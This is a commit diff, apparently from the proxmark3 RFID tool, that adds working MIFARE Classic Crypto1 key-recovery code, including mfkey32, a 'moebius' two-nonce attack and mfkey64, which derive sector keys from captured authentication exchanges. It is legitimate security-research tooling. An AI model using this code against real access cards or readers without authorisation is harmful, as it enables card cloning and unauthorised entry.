+ UsbCommand c = {CMD_MIFARE_EML_MEMSET, {(stSector[i]*4+3), 1, 0}};\r
+ memcpy(c.d.asBytes, memBlock, 16);\r
+ clearCommandBuffer();\r
+ SendCommand(&c); \r
}\r
}\r
- } else {\r
- PrintAndLog("keyA response error: %d %d %d %d %d",ar_responses[1] , ar_responses[2] , ar_responses[3] , ar_responses[6] , ar_responses[7]);\r
}\r
- if (ar_responses[1] && ar_responses[2+arnr_len] && ar_responses[3+arnr_len] && ar_responses[6+arnr_len] && ar_responses[7+arnr_len]) {\r
- keyB = mfkey32(ar_responses[0],ar_responses[1],ar_responses[2+arnr_len],ar_responses[3+arnr_len],ar_responses[6+arnr_len],ar_responses[7+arnr_len]);\r
- if (keyB>0) {\r
- PrintAndLog("\nFound KeyB: [%04x%08x]\n\n", (uint32_t) (keyB>>32), (uint32_t) (keyB & 0xFFFFFFFF));\r
- //set emulator memory for key\r
+ //moebius attack\r
+ for (uint8_t i = ATTACK_KEY_COUNT; i<ATTACK_KEY_COUNT*2; i++) {\r
+ if (ar_resp[i].ar2 > 0) {\r
+ if (tryMfk32_moebius(ar_resp[i], &key)) {\r
+ PrintAndLog("M-Found Key%s for sector %d: [%04x%08x]", (ar_resp[i].keytype) ? "B" : "A", ar_resp[i].sector, (uint32_t) (key>>32), (uint32_t) (key &0xFFFFFFFF));\r
+ }\r
}\r
}\r
- if (keyA || keyB) {\r
- //TODO retry sim with new keys in emulator memory? (somehow flag to check that to see if new key has successful auth now?)\r
- // to validate key is correct\r
- }\r
- */\r
}\r
}\r
\r
}
// 32 bit recover key from 2 nonces
-uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc) {
+bool mfkey32(nonces_t data, uint64_t *outputkey) {
struct Crypto1State *s,*t;
+ uint64_t outkey = 0;
uint64_t key=0; // recovered key
- /*uint32_t uid; // serial number
- uint32_t nt; // tag challenge
- uint32_t nr0_enc; // first encrypted reader challenge
- uint32_t ar0_enc; // first encrypted reader response
- uint32_t nr1_enc; // second encrypted reader challenge
- uint32_t ar1_enc; // second encrypted reader response
- */
- uint8_t found=0;
- //uint32_t ks2; // keystream used to encrypt reader response
-
+ uint32_t uid = data.cuid;
+ uint32_t nt = data.nonce; // first tag challenge (nonce)
+ uint32_t nr0_enc = data.nr; // first encrypted reader challenge
+ uint32_t ar0_enc = data.ar; // first encrypted reader response
+ uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
+ uint32_t ar1_enc = data.ar2; // second encrypted reader response
+ clock_t t1 = clock();
+ bool isSuccess = FALSE;
+ uint8_t counter=0;
+ //PrintAndLog("Enter mfkey32");
+ //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, nr %08x, ar %08x, nr2 %08x, ar2 %08x",data.sector, uid, nt,nr0_enc,ar0_enc,nr1_enc,ar1_enc);
// Generate lfsr succesors of the tag challenge
- prng_successor(nt, 64);
- prng_successor(nt, 96);
+ //prng_successor(nt, 64);
+ //prng_successor(nt, 96);
// Extract the keystream from the messages
//ks2 = ar0_enc ^ prng_successor(nt, 64);
crypto1_word(t, uid ^ nt, 0);
crypto1_word(t, nr1_enc, 1);
if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) {
- //printf("\nFound Key: [%012"llx"]\n\n",key);
- found = 1;
- break;
+ //PrintAndLog("Found Key: [%012"llx"]",key);
+ outkey = key;
+ counter++;
+ if (counter==20) break;
}
}
- free(s);
+ //free(s);
+ isSuccess = (counter == 1);
+ t1 = clock() - t1;
+ //if ( t1 > 0 ) PrintAndLog("Time in mfkey32: %.0f ticks \nFound %d possible keys", (float)t1, counter);
+ *outputkey = ( isSuccess ) ? outkey : 0;
+ crypto1_destroy(s);
+ FILE *fout;
+ if ((fout = fopen("stats.txt","ab")) == NULL) {
+ PrintAndLog("Could not create file name stats.txt");
+ return 1;
+ }
+ fprintf(fout, "mfkey32,%d,%d,%s,%04x%08x,%.0Lf\r\n",counter,data.sector,(data.keytype) ? "B" : "A", (uint32_t)(outkey>>32) & 0xFFFF,(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
+ fclose(fout);
+ return isSuccess;
+}
- if (found) return key;
+bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey) {
+ struct Crypto1State *s, *t;
+ uint64_t outkey = 0;
+ uint64_t key = 0; // recovered key
+ uint32_t uid = data.cuid;
+ uint32_t nt0 = data.nonce; // first tag challenge (nonce)
+ uint32_t nr0_enc = data.nr; // first encrypted reader challenge
+ uint32_t ar0_enc = data.ar; // first encrypted reader response
+ //uint32_t uid1 = le32toh(data+16);
+ uint32_t nt1 = data.nonce2; // second tag challenge (nonce)
+ uint32_t nr1_enc = data.nr2; // second encrypted reader challenge
+ uint32_t ar1_enc = data.ar2; // second encrypted reader response
+ bool isSuccess = FALSE;
+ int counter = 0;
+
+ //PrintAndLog("Enter mfkey32_moebius");
+ clock_t t1 = clock();
+
+ s = lfsr_recovery32(ar0_enc ^ prng_successor(nt0, 64), 0);
+
+ for(t = s; t->odd | t->even; ++t) {
+ lfsr_rollback_word(t, 0, 0);
+ lfsr_rollback_word(t, nr0_enc, 1);
+ lfsr_rollback_word(t, uid ^ nt0, 0);
+ crypto1_get_lfsr(t, &key);
+
+ crypto1_word(t, uid ^ nt1, 0);
+ crypto1_word(t, nr1_enc, 1);
+ if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt1, 64))) {
+ //PrintAndLog("Found Key: [%012"llx"]",key);
+ outkey=key;
+ ++counter;
+ if (counter==20)
+ break;
+ }
+ }
+ isSuccess = (counter == 1);
+ t1 = clock() - t1;
+ //if ( t1 > 0 ) PrintAndLog("Time in mfkey32_moebius: %.0f ticks \nFound %d possible keys", (float)t1,counter);
+ *outputkey = ( isSuccess ) ? outkey : 0;
+ crypto1_destroy(s);
+ FILE *fout;
+ if ((fout = fopen("stats.txt","ab")) == NULL) {
+ PrintAndLog("Could not create file name stats.txt");
+ return 1;
+ }
+ fprintf(fout, "moebius,%d,%d,%s,%04x%08x,%0.Lf\r\n",counter,data.sector, (data.keytype) ? "B" : "A", (uint32_t) (outkey>>32),(uint32_t)(outkey&0xFFFFFFFF),(long double)t1);
+ fclose(fout);
+ return isSuccess;
+}
+
+int tryMfk64_ex(uint8_t *data, uint64_t *outputkey){
+ uint32_t uid = le32toh(data);
+ uint32_t nt = le32toh(data+4); // tag challenge
+ uint32_t nr_enc = le32toh(data+8); // encrypted reader challenge
+ uint32_t ar_enc = le32toh(data+12); // encrypted reader response
+ uint32_t at_enc = le32toh(data+16); // encrypted tag response
+ return tryMfk64(uid, nt, nr_enc, ar_enc, at_enc, outputkey);
+}
+
+int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey){
+ uint64_t key = 0; // recovered key
+ uint32_t ks2; // keystream used to encrypt reader response
+ uint32_t ks3; // keystream used to encrypt tag response
+ struct Crypto1State *revstate;
+
+ PrintAndLog("Enter mfkey64");
+ clock_t t1 = clock();
+
+ // Extract the keystream from the messages
+ ks2 = ar_enc ^ prng_successor(nt, 64);
+ ks3 = at_enc ^ prng_successor(nt, 96);
+ revstate = lfsr_recovery64(ks2, ks3);
+ lfsr_rollback_word(revstate, 0, 0);
+ lfsr_rollback_word(revstate, 0, 0);
+ lfsr_rollback_word(revstate, nr_enc, 1);
+ lfsr_rollback_word(revstate, uid ^ nt, 0);
+ crypto1_get_lfsr(revstate, &key);
+ PrintAndLog("Found Key: [%012"llx"]", key);
+ crypto1_destroy(revstate);
+ *outputkey = key;
+
+ t1 = clock() - t1;
+ if ( t1 > 0 ) PrintAndLog("Time in mfkey64: %.0f ticks \n", (float)t1);
return 0;
}
+
#include <stdlib.h>
#include "crapto1.h"
#include "common.h"
+//#include <stdbool.h> //for bool
+
+typedef struct {
+ uint32_t cuid;
+ uint8_t sector;
+ uint8_t keytype;
+ uint32_t nonce;
+ uint32_t ar;
+ uint32_t nr;
+ uint32_t nonce2;
+ uint32_t ar2;
+ uint32_t nr2;
+ } nonces_t;
int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key);
-uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
+bool mfkey32(nonces_t data, uint64_t *outputkey);
+bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey);
+int tryMfk64_ex(uint8_t *data, uint64_t *outputkey);
+int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey);
+
+//uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc);
#endif
int32_t le24toh (uint8_t data[3]) {
return (data[2] << 16) | (data[1] << 8) | data[0];
}
+uint32_t le32toh (uint8_t *data) {
+ return (uint32_t)( (data[3]<<24) | (data[2]<<16) | (data[1]<<8) | data[0]);
+}
// RotateLeft - Ultralight, Desfire, works on byte level
// 00-01-02 >> 01-02-00
void xor(unsigned char *dst, unsigned char *src, size_t len);
int32_t le24toh(uint8_t data[3]);
+uint32_t le32toh (uint8_t *data);
void rol(uint8_t *data, const size_t len);
#define ISO14443A_CMD_WUPA 0x52
#define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93
#define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95
+#define ISO14443A_CMD_ANTICOLL_OR_SELECT_3 0x97
#define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ?
#define ISO14443A_CMD_HALT 0x50
#define ISO14443A_CMD_RATS 0xE0
-#define MIFARE_AUTH_KEYA 0x60
-#define MIFARE_AUTH_KEYB 0x61
-#define MIFARE_MAGICWUPC1 0x40
-#define MIFARE_MAGICWUPC2 0x43
-#define MIFARE_MAGICWIPEC 0x41
+#define MIFARE_AUTH_KEYA 0x60
+#define MIFARE_AUTH_KEYB 0x61
+#define MIFARE_MAGICWUPC1 0x40
+#define MIFARE_MAGICWUPC2 0x43
+#define MIFARE_MAGICWIPEC 0x41
#define MIFARE_CMD_INC 0xC0
#define MIFARE_CMD_DEC 0xC1
#define MIFARE_CMD_RESTORE 0xC2
#define MIFARE_CMD_TRANSFER 0xB0
+#define MIFARE_EV1_PERSONAL_UID 0x40
+#define MIFARE_EV1_SETMODE 0x43
+
+
#define MIFARE_ULC_WRITE 0xA2
//#define MIFARE_ULC__COMP_WRITE 0xA0
#define MIFARE_ULC_AUTH_1 0x1A
//Mifare simulation flags
-#define FLAG_INTERACTIVE 0x01
-#define FLAG_4B_UID_IN_DATA 0x02
-#define FLAG_7B_UID_IN_DATA 0x04
-#define FLAG_NR_AR_ATTACK 0x08
+#define FLAG_INTERACTIVE 0x01
+#define FLAG_4B_UID_IN_DATA 0x02
+#define FLAG_7B_UID_IN_DATA 0x04
+#define FLAG_10B_UID_IN_DATA 0x08
+#define FLAG_NR_AR_ATTACK 0x10
//Iclass reader flags
projects / proxmark3-svn / commitdiff